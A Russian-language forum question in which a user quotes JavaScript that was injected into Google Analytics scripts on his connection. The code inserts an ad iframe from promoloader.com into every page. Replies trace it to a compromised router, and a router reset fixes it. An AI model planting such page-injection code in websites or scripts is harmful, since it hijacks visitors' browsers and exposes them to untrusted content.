Dominic
@Dominic

Malware в скрипте Google Analytics?

Главные страницы Хабрахабра, Тостера, Гиктаймс и др. у меня выглядят так:

5df7b97d8b5e4e38a8554299c5ad113a.png43797ec560d941edb2ad97dd277a3685.png

Этот же баннер появляется на всех сайтах, использующих Google Analytics из скриптов: google-analytics.com/ga.js и www.google-analytics.com/analytics.js благодаря блоку:

var tmp = document.createElement('div');
tmp.setAttribute("align","center");
tmp.innerHTML =  "<iframe width='728' height='90' scrolling='no' marginwidth='0' marginheight='0' frameborder='0' src='http://promoloader.com/st.php?sa=32892&ps=385&sc=2&ec=1&c=1v'></iframe>";;
var iframe = tmp.firstChild;
var body = document.getElementsByTagName('body')[0]; 
body.insertBefore(tmp, body.firstChild);


Проверял из OSX Yosemite, Safari 8 и Windows 8, Google Chrome.

Временно отключил скрипт Google Analytics на своих сайтах. Проблема только у меня?
  • Вопрос задан
  • 2409 просмотров
Пригласить эксперта
Ответы на вопрос 3
Ranwise
@Ranwise
если роутер умный то могли его сломать...
Ответ написан
buttersmai
@buttersmai
Скорее всего, только у вас. У меня нормально все работает.
Да и гугл вряд ли позволил бы кому-то поломать Google Analytics.
Ответ написан
Dominic
@Dominic Автор вопроса
Спасибо за ответы. Сделал ресет рутера, сменил пароли, проблема ушла.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы